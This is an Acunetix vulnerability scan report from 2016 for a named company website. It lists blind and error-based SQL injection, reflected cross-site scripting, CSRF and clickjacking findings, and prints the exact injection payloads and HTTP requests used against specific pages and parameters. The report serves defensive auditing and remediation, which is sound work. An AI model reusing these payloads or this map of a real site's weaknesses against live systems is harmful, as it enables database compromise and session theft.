
Acunetix Website Audit

1 June, 2016

Developer Report

Generated by Acunetix WVS Reporter (v10.0 Build 20150623)

Scan of
http://www.asiatruongphat.com/baobitruongphat.com/index.php
Scan details
Scan information
Start time: 5/19/2016 10:36:52 PM
Finish time: The scan was aborted
Scan time: 10 minutes, 47 seconds
Profile: Default
Server information
Responsive: True
Server banner: nginx
Server OS: Unknown
Server technologies: PHP

Threat level
Acunetix Threat Level 3
One or more high-severity type vulnerabilities have been discovered by the scanner. A
malicious user can exploit these vulnerabilities and compromise the backend database
and/or deface your website.

Alerts distribution
Total alerts found: 27
High: 17
Medium
Low
Informational

Alerts summary
Blind SQL Injection
Classification
CVSS Base Score: 6.8
- Access Vector: Network
- Access Complexity: Medium
- Authentication: None
- Confidentiality Impact: Partial
- Integrity Impact: Partial
- Availability Impact: Partial
CWE: CWE-89
Affected items                              Variations
/baobitruongphat.com/intro.php              1
/baobitruongphat.com/news.php               1
/baobitruongphat.com/newview.php            2
/baobitruongphat.com/sanpham.php            2

Cross site scripting (verified)


Classification
CVSS Base Score: 4.4
- Access Vector: Network
- Access Complexity: Medium
- Authentication: None
- Confidentiality Impact: None
- Integrity Impact: Partial
- Availability Impact: None
CWE: CWE-79
Affected items                              Variations
/baobitruongphat.com/intro.php              1
/baobitruongphat.com/news.php               1
/baobitruongphat.com/newview.php            2
/baobitruongphat.com/sanpham.php            2

SQL injection
Classification
CVSS Base Score: 6.8
- Access Vector: Network
- Access Complexity: Medium
- Authentication: None
- Confidentiality Impact: Partial
- Integrity Impact: Partial
- Availability Impact: Partial
CWE: CWE-89
Affected items                              Variations
/baobitruongphat.com/intro.php              1
/baobitruongphat.com/newview.php            1

SQL injection (verified)


Classification
CVSS Base Score: 6.8
- Access Vector: Network
- Access Complexity: Medium
- Authentication: None
- Confidentiality Impact: Partial
- Integrity Impact: Partial
- Availability Impact: Partial
CWE: CWE-89
Affected items                              Variations
/baobitruongphat.com/news.php               1
/baobitruongphat.com/sanpham.php            2

Application error message


Classification
CVSS Base Score: 5.0
- Access Vector: Network
- Access Complexity: Low
- Authentication: None
- Confidentiality Impact: Partial
- Integrity Impact: None
- Availability Impact: None
CWE: CWE-200
Affected items                              Variations
/baobitruongphat.com/intro.php              1
/baobitruongphat.com/news.php               1
/baobitruongphat.com/newview.php            1
/baobitruongphat.com/sanpham.php            2

HTML form without CSRF protection


Classification
CVSS Base Score: 2.6
- Access Vector: Network
- Access Complexity: High
- Authentication: None
- Confidentiality Impact: None
- Integrity Impact: Partial
- Availability Impact: None
CWE: CWE-352
Affected items                                                          Variations
/baobitruongphat.com/sanpham.php (3ce8cc7a5300957559fcc329f1e1c267)     1

Clickjacking: X-Frame-Options header missing


Classification
CVSS Base Score: 6.8
- Access Vector: Network
- Access Complexity: Medium
- Authentication: None
- Confidentiality Impact: Partial
- Integrity Impact: Partial
- Availability Impact: Partial
CWE: CWE-693
Affected items                              Variations
Web Server                                  1

OPTIONS method is enabled


Classification
CVSS Base Score: 5.0
- Access Vector: Network
- Access Complexity: Low
- Authentication: None
- Confidentiality Impact: Partial
- Integrity Impact: None
- Availability Impact: None
CWE: CWE-200
Affected items                              Variations
Web Server                                  1

Possible virtual host found


Classification
CVSS Base Score: 5.0
- Access Vector: Network
- Access Complexity: Low
- Authentication: None
- Confidentiality Impact: Partial
- Integrity Impact: None
- Availability Impact: None
CWE: CWE-200
Affected items                              Variations
webmail.asiatruongphat.com                  1

Broken links
Classification
CVSS Base Score: 0.0
- Access Vector: Network
- Access Complexity: Low
- Authentication: None
- Confidentiality Impact: None
- Integrity Impact: None
- Availability Impact: None
CWE: CWE-16
Affected items                              Variations
/baobitruongphat.com/sitemap.php            1

Alert details
Blind SQL Injection
Severity
High
Type
Validation
Reported by module Scripting (Blind_Sql_Injection.script)
Description
This script is possibly vulnerable to SQL Injection attacks.
SQL injection is a vulnerability that allows an attacker to alter back-end SQL statements by manipulating the user input.
An SQL injection occurs when a web application accepts user input that is placed directly into a SQL statement without
properly filtering out dangerous characters.
This is one of the most common application layer attacks currently in use on the Internet. Despite the fact that it is
relatively easy to protect against, a large number of web applications remain vulnerable.
Impact
An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your
database and/or expose sensitive information.
Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access
for the attacker. It may be possible to not only manipulate existing queries, but to UNION in arbitrary data, use sub
selects, or append additional queries. In some cases, it may be possible to read in or write out to files, or to execute shell
commands on the underlying operating system.
Certain SQL Servers such as Microsoft SQL Server contain stored and extended procedures (database server
functions). If an attacker can obtain access to these procedures it may be possible to compromise the entire machine.
Recommendation
Your script should filter metacharacters from user input.
Check detailed information for more information about fixing this vulnerability.
References
How to check for SQL injection vulnerabilities
SQL Injection Walkthrough
VIDEO: SQL Injection tutorial
Acunetix SQL Injection Attack
OWASP PHP Top 5
OWASP Injection Flaws
Affected items
/baobitruongphat.com/intro.php
Details
URL encoded GET input id was set to if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/
Tests performed:
- if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/ =>
6.953 s
- if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => ...
(line truncated)
Request headers
GET /baobitruongphat.com/intro.php?id=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/ HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.asiatruongphat.com/baobitruongphat.com/index.php
Host: www.asiatruongphat.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/baobitruongphat.com/news.php
Details
URL encoded GET input id was set to 3 AND 3*2*1=6 AND 598=598
Tests performed:
- 0+0+0+3 => TRUE
- 0+598*593+3 => FALSE
- 13-5-2-999 => FALSE
- 13-5-2-3 => TRUE
- 13-2*5+0+0+1-1 => TRUE
- 13-2*6+0+0+1-1 => FALSE
- 3 AND 2+1-1-1=1 AND 598=598 => TRUE
- 3 AND 3+1-1-1=1 AND 598=598 => FALSE[/ ... (line truncated)
Request headers
GET /baobitruongphat.com/news.php?id=3%20AND%203*2*1%3d6%20AND%20598%3d598 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.asiatruongphat.com/baobitruongphat.com/index.php
Host: www.asiatruongphat.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/baobitruongphat.com/newview.php
Details
URL encoded GET input id was set to 3 AND 3*2*1=6 AND 903=903
Tests performed:
- 0+0+0+3 => TRUE
- 0+903*898+3 => FALSE
- 13-5-2-999 => FALSE
- 13-5-2-3 => TRUE
- 13-2*5+0+0+1-1 => TRUE
- 13-2*6+0+0+1-1 => FALSE
- 3 AND 2+1-1-1=1 AND 903=903 => TRUE
- 3 AND 3+1-1-1=1 AND 903=903 => FALSE[/ ... (line truncated)
Request headers
GET /baobitruongphat.com/newview.php?id=3%20AND%203*2*1%3d6%20AND%20903%3d903&mt=81 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.asiatruongphat.com/baobitruongphat.com/index.php
Host: www.asiatruongphat.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/baobitruongphat.com/newview.php
Details
URL encoded GET input mt was set to 79 AND 3*2*1=6 AND 73=73
Tests performed:
- 0+0+0+79 => TRUE
- 0+73*68+79 => FALSE
- 89-5-2-999 => FALSE
- 89-5-2-3 => TRUE
- 89-2*5+0+0+1-1 => TRUE
- 89-2*6+0+0+1-1 => FALSE
- 79 AND 2+1-1-1=1 AND 73=73 => TRUE
- 79 AND 3+1-1-1=1 AND 73=73 => FALSE[/bol ... (line truncated)
Request headers
GET /baobitruongphat.com/newview.php?id=3&mt=79%20AND%203*2*1%3d6%20AND%2073%3d73 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.asiatruongphat.com/baobitruongphat.com/index.php
Host: www.asiatruongphat.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/baobitruongphat.com/sanpham.php
Details
URL encoded GET input id was set to 42 AND 3*2*1=6 AND 415=415
Tests performed:
- 0+0+0+42 => TRUE
- 0+415*410+42 => FALSE
- 52-5-2-999 => FALSE
- 52-5-2-3 => TRUE
- 52-2*5+0+0+1-1 => TRUE
- 52-2*6+0+0+1-1 => FALSE
- 42 AND 2+1-1-1=1 AND 415=415 => TRUE
- 42 AND 3+1-1-1=1 AND 415=415 => FA ... (line truncated)
Request headers
POST /baobitruongphat.com/sanpham.php?id=42%20AND%203*2*1%3d6%20AND%20415%3d415 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.asiatruongphat.com/baobitruongphat.com/index.php
Host: www.asiatruongphat.com
Content-Length: 0
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/baobitruongphat.com/sanpham.php
Details
URL encoded GET input id was set to 43 AND 3*2*1=6 AND 751=751
Tests performed:
- 0+0+0+43 => TRUE
- 0+751*746+43 => FALSE
- 53-5-2-999 => FALSE
- 53-5-2-3 => TRUE
- 53-2*5+0+0+1-1 => TRUE
- 53-2*6+0+0+1-1 => FALSE
- 43 AND 2+1-1-1=1 AND 751=751 => TRUE
- 43 AND 3+1-1-1=1 AND 751=751 => FA ... (line truncated)
Request headers
GET /baobitruongphat.com/sanpham.php?id=43%20AND%203*2*1%3d6%20AND%20751%3d751 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.asiatruongphat.com/baobitruongphat.com/index.php
Host: www.asiatruongphat.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

Cross site scripting (verified)


Severity
High
Type
Validation
Reported by module Scripting (XSS.script)
Description
This script is possibly vulnerable to Cross Site Scripting (XSS) attacks.
Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in
the form of JavaScript) to another user. Because a browser cannot know whether the script should be trusted, it will
execute the script in the user's context, allowing the attacker to access any cookies or session tokens retained by the
browser.
Impact
Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in
order to gather data from them. An attacker can steal the session cookie and take over the account, impersonating the
user. It is also possible to modify the content of the page presented to the user.
Recommendation
Your script should filter metacharacters from user input.
References
XSS Filter Evasion Cheat Sheet
How To: Prevent Cross-Site Scripting in ASP.NET
OWASP PHP Top 5
Cross site scripting
VIDEO: How Cross-Site Scripting (XSS) Works
The Cross Site Scripting Faq
OWASP Cross Site Scripting
Acunetix Cross Site Scripting Attack
XSS Annihilation
Affected items
/baobitruongphat.com/intro.php
Details
URL encoded GET input id was set to 2'"()&%<acx><ScRiPt >prompt(930407)</ScRiPt>
Request headers
GET /baobitruongphat.com/intro.php?id=2'%22()%26%25<acx><ScRiPt%20>prompt(930407)</ScRiPt> HTTP/1.1
Referer: http://www.asiatruongphat.com/baobitruongphat.com/index.php
Host: www.asiatruongphat.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/baobitruongphat.com/news.php
Details
URL encoded GET input id was set to 3'"()&%<acx><ScRiPt >prompt(986729)</ScRiPt>
Request headers
GET /baobitruongphat.com/news.php?id=3'%22()%26%25<acx><ScRiPt%20>prompt(986729)</ScRiPt> HTTP/1.1
Referer: http://www.asiatruongphat.com/baobitruongphat.com/index.php
Host: www.asiatruongphat.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/baobitruongphat.com/newview.php
Details
URL encoded GET input id was set to 3'"()&%<acx><ScRiPt >prompt(935239)</ScRiPt>
Request headers
GET /baobitruongphat.com/newview.php?id=3'%22()%26%25<acx><ScRiPt%20>prompt(935239)</ScRiPt>&mt=81 HTTP/1.1
Referer: http://www.asiatruongphat.com/baobitruongphat.com/index.php
Host: www.asiatruongphat.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/baobitruongphat.com/newview.php
Details
URL encoded GET input mt was set to 79'"()&%<acx><ScRiPt >prompt(994796)</ScRiPt>
Request headers
GET /baobitruongphat.com/newview.php?id=3&mt=79'%22()%26%25<acx><ScRiPt%20>prompt(994796)</ScRiPt> HTTP/1.1
Referer: http://www.asiatruongphat.com/baobitruongphat.com/index.php
Host: www.asiatruongphat.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/baobitruongphat.com/sanpham.php
Details
URL encoded GET input id was set to 42'"()&%<acx><ScRiPt >prompt(946739)</ScRiPt>
Request headers
POST /baobitruongphat.com/sanpham.php?id=42'%22()%26%25<acx><ScRiPt%20>prompt(946739)</ScRiPt> HTTP/1.1
Referer: http://www.asiatruongphat.com/baobitruongphat.com/index.php
Host: www.asiatruongphat.com
Content-Length: 0
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/baobitruongphat.com/sanpham.php
Details
URL encoded GET input id was set to 43'"()&%<acx><ScRiPt >prompt(977060)</ScRiPt>
Request headers
GET /baobitruongphat.com/sanpham.php?id=43'%22()%26%25<acx><ScRiPt%20>prompt(977060)</ScRiPt> HTTP/1.1
Referer: http://www.asiatruongphat.com/baobitruongphat.com/index.php
Host: www.asiatruongphat.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

SQL injection
Severity
High
Type
Validation
Reported by module Scripting (Sql_Injection.script)
Description
This script is possibly vulnerable to SQL Injection attacks.
SQL injection is a vulnerability that allows an attacker to alter back-end SQL statements by manipulating the user input.
An SQL injection occurs when a web application accepts user input that is placed directly into a SQL statement without
properly filtering out dangerous characters.
This is one of the most common application layer attacks currently in use on the Internet. Despite the fact that it is
relatively easy to protect against, a large number of web applications remain vulnerable.
Impact
An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your
database and/or expose sensitive information.
Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access
for the attacker. It may be possible to not only manipulate existing queries, but to UNION in arbitrary data, use sub
selects, or append additional queries. In some cases, it may be possible to read in or write out to files, or to execute shell
commands on the underlying operating system.
Certain SQL Servers such as Microsoft SQL Server contain stored and extended procedures (database server
functions). If an attacker can obtain access to these procedures it may be possible to compromise the entire machine.
Recommendation
Your script should filter metacharacters from user input.
Check detailed information for more information about fixing this vulnerability.
References
Acunetix SQL Injection Attack
VIDEO: SQL Injection tutorial
OWASP Injection Flaws
How to check for SQL injection vulnerabilities
SQL Injection Walkthrough
OWASP PHP Top 5
Affected items
/baobitruongphat.com/intro.php
Details
URL encoded GET input id was set to 1'"
Error message found: You have an error in your SQL syntax
Request headers
GET /baobitruongphat.com/intro.php?id=1'%22 HTTP/1.1
Referer: http://www.asiatruongphat.com/baobitruongphat.com/index.php
Host: www.asiatruongphat.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/baobitruongphat.com/newview.php
Details
URL encoded GET input id was set to 1'"
Error message found: You have an error in your SQL syntax
Request headers
GET /baobitruongphat.com/newview.php?id=1'%22&mt=81 HTTP/1.1
Referer: http://www.asiatruongphat.com/baobitruongphat.com/index.php
Host: www.asiatruongphat.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

SQL injection (verified)


Severity
High
Type
Validation
Reported by module Scripting (Sql_Injection.script)
Description
This script is possibly vulnerable to SQL Injection attacks.
SQL injection is a vulnerability that allows an attacker to alter back-end SQL statements by manipulating the user input.
An SQL injection occurs when a web application accepts user input that is placed directly into a SQL statement without
properly filtering out dangerous characters.
This is one of the most common application layer attacks currently in use on the Internet. Despite the fact that it is
relatively easy to protect against, a large number of web applications remain vulnerable.
Impact
An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your
database and/or expose sensitive information.
Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access
for the attacker. It may be possible to not only manipulate existing queries, but to UNION in arbitrary data, use sub
selects, or append additional queries. In some cases, it may be possible to read in or write out to files, or to execute shell
commands on the underlying operating system.
Certain SQL Servers such as Microsoft SQL Server contain stored and extended procedures (database server
functions). If an attacker can obtain access to these procedures it may be possible to compromise the entire machine.
Recommendation
Your script should filter metacharacters from user input.
Check detailed information for more information about fixing this vulnerability.
References
Acunetix SQL Injection Attack
VIDEO: SQL Injection tutorial
OWASP Injection Flaws
How to check for SQL injection vulnerabilities
SQL Injection Walkthrough
OWASP PHP Top 5
Affected items
/baobitruongphat.com/news.php
Details
URL encoded GET input id was set to (select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(55),CHAR(81),CHAR(74),CHAR(66),CHAR(90),CHAR(108),CHAR(99),CHAR(109)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
Injected pattern found: 4Cu7QJBZlcm
Request headers
GET /baobitruongphat.com/news.php?id=(select%201%20and%20row(1%2c1)>(select%20count(*)%2cconcat(concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(55)%2cCHAR(81)%2cCHAR(74)%2cCHAR(66)%2cCHAR(90)%2cCHAR(108)%2cCHAR(99)%2cCHAR(109))%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201)) HTTP/1.1
Host: www.asiatruongphat.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/baobitruongphat.com/sanpham.php
Details
URL encoded GET input id was set to (select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(76),CHAR(49),CHAR(117),CHAR(84),CHAR(48),CHAR(81),CHAR(80),CHAR(106)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
Injected pattern found: 4CuL1uT0QPj
Request headers
POST /baobitruongphat.com/sanpham.php?id=(select%201%20and%20row(1%2c1)>(select%20count(*)%2cconcat(concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(76)%2cCHAR(49)%2cCHAR(117)%2cCHAR(84)%2cCHAR(48)%2cCHAR(81)%2cCHAR(80)%2cCHAR(106))%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201)) HTTP/1.1
Host: www.asiatruongphat.com
Content-Length: 0
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/baobitruongphat.com/sanpham.php
Details
URL encoded GET input id was set to (select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(89),CHAR(104),CHAR(51),CHAR(112),CHAR(51),CHAR(84),CHAR(114),CHAR(82)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
Injected pattern found: 4CuYh3p3TrR
Request headers
GET /baobitruongphat.com/sanpham.php?id=(select%201%20and%20row(1%2c1)>(select%20count(*)%2cconcat(concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(89)%2cCHAR(104)%2cCHAR(51)%2cCHAR(112)%2cCHAR(51)%2cCHAR(84)%2cCHAR(114)%2cCHAR(82))%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201)) HTTP/1.1
Host: www.asiatruongphat.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

Application error message


Severity
Medium
Type
Validation
Reported by module Scripting (Error_Message.script)
Description
This page contains an error/warning message that may disclose sensitive information. The message can also contain the
location of the file that produced the unhandled exception.
This may be a false positive if the error message is found in documentation pages.
Impact
The error messages may disclose sensitive information. This information can be used to launch further attacks.
Recommendation
Review the source code for this script.
References
PHP Runtime Configuration
Affected items
/baobitruongphat.com/intro.php
Details
URL encoded GET input id was set to
Error message found: You have an error in your SQL syntax
Request headers
GET /baobitruongphat.com/intro.php?id= HTTP/1.1
Referer: http://www.asiatruongphat.com/baobitruongphat.com/index.php
Host: www.asiatruongphat.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/baobitruongphat.com/news.php
Details
URL encoded GET input id was set to
Error message found: You have an error in your SQL syntax
Request headers
GET /baobitruongphat.com/news.php?id= HTTP/1.1
Referer: http://www.asiatruongphat.com/baobitruongphat.com/index.php
Host: www.asiatruongphat.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/baobitruongphat.com/newview.php
Details
URL encoded GET input id was set to
Error message found: You have an error in your SQL syntax
Request headers
GET /baobitruongphat.com/newview.php?id=&mt=81 HTTP/1.1
Referer: http://www.asiatruongphat.com/baobitruongphat.com/index.php
Host: www.asiatruongphat.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/baobitruongphat.com/sanpham.php
Details
URL encoded GET input id was set to
Error message found: You have an error in your SQL syntax
Request headers
GET /baobitruongphat.com/sanpham.php?id= HTTP/1.1
Referer: http://www.asiatruongphat.com/baobitruongphat.com/index.php
Host: www.asiatruongphat.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/baobitruongphat.com/sanpham.php
Details
URL encoded GET input id was set to
Error message found: You have an error in your SQL syntax
Request headers
POST /baobitruongphat.com/sanpham.php?id= HTTP/1.1
Referer: http://www.asiatruongphat.com/baobitruongphat.com/index.php
Host: www.asiatruongphat.com
Content-Length: 0
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

HTML form without CSRF protection


Severity
Medium
Type
Informational
Reported by module Crawler
Description
This alert may be a false positive, manual confirmation is required.
Cross-site request forgery, also known as a one-click attack or session riding and abbreviated as CSRF or XSRF, is a
type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website
trusts.
Acunetix WVS found an HTML form with no apparent CSRF protection implemented. Consult the details for more information
about the affected HTML form.
Impact
An attacker may force the users of a web application to execute actions of the attacker's choosing. A successful CSRF
exploit can compromise end user data and operations in the case of a normal user. If the targeted end user is the administrator
account, this can compromise the entire web application.
Recommendation
Check if this form requires CSRF protection and implement CSRF countermeasures if necessary.
Affected items
/baobitruongphat.com/sanpham.php (3ce8cc7a5300957559fcc329f1e1c267)
Details
Form name: <empty>
Form action: http://www.asiatruongphat.com/baobitruongphat.com/sanpham.php?id=43
Form method: POST
Request headers
GET /baobitruongphat.com/sanpham.php?id=43 HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.asiatruongphat.com/baobitruongphat.com/intro.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Host: www.asiatruongphat.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

Clickjacking: X-Frame-Options header missing


Severity
Low
Type
Configuration
Reported by module Scripting (Clickjacking_X_Frame_Options.script)
Description
Clickjacking (User Interface redress attack, UI redress attack, UI redressing) is a malicious technique of tricking a Web
user into clicking on something different from what the user perceives they are clicking on, thus potentially revealing
confidential information or taking control of their computer while clicking on seemingly innocuous web pages.
The server didn't return an X-Frame-Options header which means that this website could be at risk of a clickjacking
attack. The X-Frame-Options HTTP response header can be used to indicate whether or not a browser should be
allowed to render a page inside a frame or iframe. Sites can use this to avoid clickjacking attacks, by ensuring that their
content is not embedded into other sites.
Impact
The impact depends on the affected web application.
Recommendation
Configure your web server to include an X-Frame-Options header. Consult Web references for more information about
the possible values for this header.
References
Clickjacking
Original Clickjacking paper
Defending with Content Security Policy frame-ancestors directive
Frame Buster Buster
Clickjacking Protection for Java EE
The X-Frame-Options response header
Affected items
Web Server
Details
No details are available.
Request headers
GET / HTTP/1.1
Host: www.asiatruongphat.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

OPTIONS method is enabled


Severity
Low
Type
Validation
Reported by module Scripting (Options_Server_Method.script)
Description
The HTTP OPTIONS method is enabled on this web server. The OPTIONS method provides a list of the methods that are
supported by the web server; it represents a request for information about the communication options available on the
request/response chain identified by the Request-URI.
Impact
The OPTIONS method may expose sensitive information that may help a malicious user to prepare more advanced
attacks.
Recommendation
It's recommended to disable OPTIONS Method on the web server.
References
Testing for HTTP Methods and XST (OWASP-CM-008)
Affected items
Web Server
Details
Methods allowed: GET,HEAD,POST,OPTIONS
Request headers
OPTIONS / HTTP/1.1
Host: www.asiatruongphat.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

Possible virtual host found


Severity
Low
Type
Configuration
Reported by module Scripting (VirtualHost_Audit.script)
Description
Virtual hosting is a method for hosting multiple domain names (with separate handling of each name) on a single server
(or pool of servers). This allows one server to share its resources, such as memory and processor cycles, without
requiring all services provided to use the same host name.
This web server is responding differently when the Host header is manipulated and various common virtual hosts are
tested. This could indicate there is a Virtual Host present.
Impact
Possible sensitive information disclosure.
Recommendation
Consult the virtual host configuration and check if this virtual host should be publicly accessible.
References
Virtual hosting
Affected items
webmail.asiatruongphat.com
Details
VirtualHost: webmail.asiatruongphat.com
Response:
<!DOCTYPE html>
<html dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="google" content="notranslate" />
<title>Webmail Login</title>
Request headers
GET / HTTP/1.1
Host: webmail.asiatruongphat.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*

Broken links
Severity
Informational
Type
Informational
Reported by module Crawler
Description
A broken link is any link that should lead to a document, image or webpage but actually results in an error.
This page was linked from the website but it is inaccessible.
Impact
Problems navigating the site.
Recommendation
Remove the links to this file or make it accessible.
Affected items
/baobitruongphat.com/sitemap.php
Details
For a complete list of URLs linking to this file, go to Site Structure > Locate and select the file (marked as "Not Found") >
select Referrers Tab from the bottom of the Information pane.
Request headers
